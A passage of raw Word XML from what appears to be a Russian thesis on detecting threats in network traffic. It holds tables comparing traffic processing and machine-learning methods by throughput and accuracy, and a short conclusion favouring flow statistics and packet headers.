      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="6855A219" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0062B9CA"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Полный разбор пакетов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="667E2D68"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10–50 тыс.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A0E360"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="643F8DA6"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="752A06D9"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="3BB0DE04" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38388F3F"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Статистические метрики потока</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CDC2885"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100–500 тыс.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="550B5ED7"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Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="304246EE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A7F6B8"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Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="274657FC" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B420BF5" w14:textId="13234AA8"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 xml:space="preserve">Заголовки </w:t>
            </w:r>
            <w:r w:rsidR="003770F2" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">пакетов </w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>+ метаданные</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FD17AEF"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50–200 тыс.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2266273A"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43FB8E0C"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2485421F"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Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="64CB1762" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50AA2547" w14:textId="35AB2292"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 xml:space="preserve">Глубокий анализ </w:t>
            </w:r>
            <w:r w:rsidR="003770F2" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>полезной нагрузки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A65009E"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&lt;10 тыс.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FD56F7B"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Очень высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A22C9D4"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63A5A580" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C022BB"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C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Очень высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E4CFC6B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="008E0171" w:rsidP="00C022BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7C6B57" w14:textId="7C82B94D" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E90BA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Методы обработки сетевого трафика показывают различный баланс между скоростью и точностью. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>На основании таблицы 10 делаем вывод, что</w:t>
      </w:r>
      <w:r w:rsidRPr="00E90BA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> наиболее перспективным является использование статистических метрик потока и заголовков </w:t>
      </w:r>
      <w:r w:rsidR="003770F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пакетов</w:t>
      </w:r>
      <w:r w:rsidRPr="00E90BA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с метаданными, что обеспечивает приемлемую производительность при сохранении достаточной точности детекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8AE238" w14:textId="53296C1C" w:rsidR="00967078" w:rsidRDefault="008E0171" w:rsidP="00C022BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B38D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для реализации детектирования применяются различные алгоритмы искусственного интеллекта. В таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="001B38D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> приведено сравнение наиболее распространённых методов в контексте задачи анализа сетевого трафика</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B2135" w14:textId="77777777" w:rsidR="00E27915" w:rsidRPr="005A1278" w:rsidRDefault="00E27915" w:rsidP="00C022BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74AD3AB1" w14:textId="410366C8" w:rsidR="008E0171" w:rsidRPr="001B38D2" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица 11 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50EDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B38D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнение методов обучения </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9686" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1936"/>
        <w:gridCol w:w="1461"/>
        <w:gridCol w:w="2127"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="2036"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="001B38D2" w14:paraId="094B473A" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="630"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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B17C08" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Метод / Архитектура</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17F00FC2" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Тип обучения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F993893" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Преимущества</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="641C5AF5" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Недостатки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EDA5713" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Применимость в данной работе</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C022BB" w:rsidRPr="001B38D2" w14:paraId="4A1F6B37" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="309"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79CE03A2" w14:textId="0261EAB4" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F6E5A61" w14:textId="0175A67B" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="778E373E" w14:textId="19805ACF" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25EA370B" w14:textId="6C28826B" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
